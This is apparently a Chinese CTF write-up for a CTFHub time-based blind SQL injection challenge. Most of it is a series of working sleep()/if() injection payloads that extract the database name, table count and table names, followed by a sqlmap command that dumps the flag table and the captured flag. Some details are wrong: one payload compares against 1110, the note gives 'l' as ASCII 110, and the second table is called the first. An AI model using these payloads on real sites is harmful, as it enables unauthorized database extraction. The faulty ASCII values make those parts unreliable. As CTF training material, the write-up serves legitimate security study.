考点
SQL时间盲注
时间盲注攻击
利用sleep()或benchmark()等函数让mysql执行时间变长经常与if(expr1,expr2,expr3)语句结合使用,通过页面的响应时间来判断条件是否正确。if(expr1,expr2,expr3)含义是如果expr1是True,则返回expr2,否则返回expr3。
分析过程
1 and if(length(database())=5,sleep(3),1)
1 and if(length(database())=4,sleep(3),1)
1 and if(length(database())=3,sleep(3),1)
页面3秒钟后才响应,说明数据库名称长度=4
猜解数据库名称
1 and if(ascii(substr(database(),1,1))>110,sleep(3),1)
1 and if(ascii(substr(database(),1,1))=115,sleep(3),1) ascii(s)=115
1 and if(ascii(substr(database(),2,1))>110,sleep(3),1)
1 and if(ascii(substr(database(),2,1))=113,sleep(3),1) ascii(q)=113
1 and if(ascii(substr(database(),3,1))>110,sleep(3),1)
1 and if(ascii(substr(database(),3,1))=1110,sleep(3),1) ascii(l)=110
1 and if(ascii(substr(database(),4,1))>110,sleep(3),1)
1 and if(ascii(substr(database(),4,1))=105,sleep(3),1) ascii(i)=105
......
不断调整ASCII码的范围逐渐得到数据库名称为sqli
sqli数据库中表的数量
1 and if((select count(table_name) from information_schema.tables
where table_schema=database())=2,sleep(3),1)
页面3秒后响应,说明有两张表
1 and if(ascii(substr((select table_name from information_schema.tables
where table_schema=database() limit 0,1),1,1))=110,sleep(3),1)
ascii(n)=110
3秒后响应,说明第一张表的第一个字母为n
依次得到表名为news
1 and if(ascii(substr((select table_name from information_schema.tables
where table_schema=database() limit 1,1),1,1))=102,sleep(3),1)
ascii(f)=102
3秒后响应,说明第一张表的第一个字母为f
依次得到表名为flag
要挨个试出来工作量有点大 ,上sqlmap
playload
sqlmap -u "http://challenge-3c2ee474fb29b646.sandbox.
ctfhub.com:10080/?id=1" -D sqli -T flag --columns --dump
得到flag
ctfhub{9bc0b66282f7a71f2ca1ebbc}